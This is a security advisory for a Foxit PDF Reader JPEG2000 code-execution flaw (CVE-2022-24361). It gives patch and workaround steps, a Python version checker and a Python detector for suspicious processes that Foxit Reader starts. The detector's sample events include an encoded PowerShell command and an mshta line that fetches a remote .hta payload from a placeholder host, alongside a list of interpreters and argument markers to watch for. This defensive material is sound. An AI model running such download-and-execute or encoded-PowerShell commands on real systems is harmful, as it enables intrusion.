CVE-2022-24361

8.8 HIGH

📋 TL;DR

This vulnerability in Foxit PDF Reader allows remote attackers to execute arbitrary code by tricking users into opening malicious PDF files containing specially crafted JPEG2000 images. The flaw exists in improper data validation during JPEG2000 parsing, leading to memory corruption. All users of affected Foxit PDF Reader versions are at risk.

💻 Affected Systems

Products:
  • Foxit PDF Reader
Versions: 11.1.0.52543 and earlier versions
Operating Systems: Windows
Default Config Vulnerable: ⚠️ Yes
Notes: All default installations are vulnerable. User interaction required (opening malicious PDF).


⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise through remote code execution with user privileges, potentially leading to data theft, ransomware deployment, or lateral movement within networks.

🟠

Likely Case

Attackers deliver malicious PDFs via phishing emails or compromised websites, executing malware on victim systems when users open the documents.

🟢

If Mitigated

With proper patching and security controls, impact is limited to failed exploitation attempts that may cause application crashes but no code execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: MEDIUM

Exploitation requires user interaction but no authentication. ZDI published advisory with technical details.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 11.1.1 or later

Vendor Advisory: https://www.foxit.com/support/security-bulletins.html

Restart Required: No

Instructions:

  1. Open Foxit PDF Reader.
  2. Go to Help > Check for Updates.
  3. Follow the prompts to install the latest version.
  4. Alternatively, download and install the latest version from the Foxit website.

🔧 Temporary Workarounds

Disable JPEG2000 image rendering
  Platform: windows
  Prevent Foxit from processing JPEG2000 images, which are rarely used in PDFs.
  Command: Not applicable - configuration change only

Use alternative PDF reader
  Platform: all
  Temporarily switch to a different PDF reader while patching.

🧯 If You Can't Patch

  • Restrict user permissions to limit potential damage from code execution
  • Implement application whitelisting to prevent unauthorized executables from running

🔍 How to Verify

Check if Vulnerable:

Check the Foxit PDF Reader version in Help > About. If the version is 11.1.0.52543 or earlier, the system is vulnerable.

Check Version:

Not applicable - check via GUI in Help > About

Verify Fix Applied:

Verify that the version is 11.1.1 or later in Help > About. Test with a known-safe PDF containing JPEG2000 images.
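The GUI check above works for one machine; across a fleet you would normally run it against a software-inventory export. The following is an added example (not part of this advisory and not Foxit tooling) that applies the same rule, "below 11.1.1 means affected", to inventory rows. The CSV layout, the hostnames and the versions other than 11.1.0.52543 and 11.1.1 are constructed for illustration. The point worth noting is that versions must be compared numerically per component: a plain string compare would rank 9.7.0 above 11.1.1.

```python
"""Flag Foxit PDF Reader installs still below the CVE-2022-24361 fix version.

Added example. Assumes a software-inventory export with "host,product,version"
rows; the sample rows below are constructed, not real inventory data.
"""
import csv
import io
import re

# Versions below this are affected; 11.1.1 and later carry the vendor fix.
FIXED_VERSION = (11, 1, 1)


def parse_version(text):
    """Turn '11.1.0.52543' into (11, 1, 0, 52543).

    Parsing stops at the first component that does not start with digits,
    so trailing tags such as 'beta' do not raise.
    """
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    if not parts:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(parts)


def is_vulnerable(version):
    """True when the installed version is older than the fixed 11.1.1.

    Tuple comparison is numeric per component, so '9.7.0' sorts below
    '11.1.1' (a string compare would not), and '11.1.0.52543' sorts below
    '11.1.1' even though it has one more component.
    """
    return parse_version(version) < FIXED_VERSION


# Constructed sample export; only 11.1.0.52543 and 11.1.1 come from the advisory.
SAMPLE_INVENTORY = """\
host,product,version
ws-101,Foxit PDF Reader,11.1.0.52543
ws-102,Foxit PDF Reader,11.1.1
ws-103,Foxit PDF Reader,9.7.0
ws-104,Foxit PDF Reader,11.2.0
ws-105,Other PDF Reader,22.0.1
"""


def find_exposed_hosts(csv_text):
    """Return hostnames whose Foxit PDF Reader is below the fixed version."""
    exposed = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["product"] != "Foxit PDF Reader":
            continue  # other readers are out of scope for this CVE
        if is_vulnerable(row["version"]):
            exposed.append(row["host"])
    return exposed


if __name__ == "__main__":
    for host in find_exposed_hosts(SAMPLE_INVENTORY):
        print(f"{host}: Foxit PDF Reader below 11.1.1, patch required")
```

Feed `find_exposed_hosts` the text of your real inventory export (same three columns) to get the list of hosts still to patch.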

📡 Detection & Monitoring

Log Indicators:

  • Application crashes of Foxit Reader
  • Unusual process creation from Foxit Reader

Network Indicators:

  • Downloads of PDF files from suspicious sources
  • Outbound connections from Foxit Reader process

SIEM Query:

Process Creation where Parent Process Name contains 'FoxitReader.exe' AND Command Line contains unusual parameters
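The SIEM query above is pseudo-syntax. The following added example (not from this advisory, and not a vendor rule) turns it into runnable detection logic over a process-creation export, so it can be tested offline before being ported to your SIEM. It assumes events as JSON lines carrying Sysmon Event ID 1 style fields (`ParentImage`, `Image`, `CommandLine`, `RecordId`); the sample events, the install path and the interpreter list and "unusual" argument markers are constructed assumptions that you should tune to what your own Foxit deployments legitimately spawn.

```python
"""Flag child processes of FoxitReader.exe that look unusual.

Added example implementing the SIEM query above in code. Assumes JSON-lines
events with Sysmon-style fields; all sample events below are constructed.
"""
import json
import ntpath

PARENT = "foxitreader.exe"

# Children a PDF reader has no business launching on a normal workstation
# (assumed allow/deny split; adjust for your environment).
INTERPRETERS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
# Command-line fragments that are unusual in anything a reader spawns.
UNUSUAL_ARGS = ("-enc", "http://", "https://", "frombase64string")


def basename(path):
    """Lower-cased file name of a Windows path; works on any host OS."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the reasons an event looks suspicious (empty list if benign)."""
    if basename(event.get("ParentImage", "")) != PARENT:
        return []  # only children of Foxit Reader are in scope
    reasons = []
    child = basename(event.get("Image", ""))
    if child in INTERPRETERS:
        reasons.append(f"interpreter child: {child}")
    cmd = event.get("CommandLine", "").lower()
    hits = [a for a in UNUSUAL_ARGS if a in cmd]
    if hits:
        reasons.append("unusual arguments: " + ", ".join(hits))
    return reasons


def scan(lines):
    """Return (RecordId, reasons) for each suspicious event in a JSON-lines export."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the whole scan
        reasons = classify(ev)
        if reasons:
            findings.append((ev.get("RecordId"), reasons))
    return findings


# Constructed sample export (paths, users and URLs are placeholders).
SAMPLE_EVENTS = r"""
{"RecordId": 1, "ParentImage": "C:\\Program Files\\Foxit\\FoxitReader.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -enc BASE64PLACEHOLDER"}
{"RecordId": 2, "ParentImage": "C:\\Program Files\\Foxit\\FoxitReader.exe", "Image": "C:\\Program Files\\Foxit\\FoxitReader.exe", "CommandLine": "\"FoxitReader.exe\" C:\\Users\\alice\\Downloads\\invoice.pdf"}
{"RecordId": 3, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"}
{"RecordId": 4, "ParentImage": "C:\\Program Files\\Foxit\\FoxitReader.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe https://example.invalid/stage.hta"}
not json at all
"""


if __name__ == "__main__":
    for record_id, reasons in scan(SAMPLE_EVENTS.splitlines()):
        print(f"record {record_id}: " + "; ".join(reasons))
```

Record 2 (Foxit opening another document) and record 3 (cmd.exe launched from Explorer, not from Foxit) produce no finding, which is the behaviour you want from the "parent is FoxitReader.exe" filter; records 1 and 4 match both halves of the query. Expect browsers launched from links inside PDFs to trip the URL marker, so allow-list your approved browser image before deploying.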
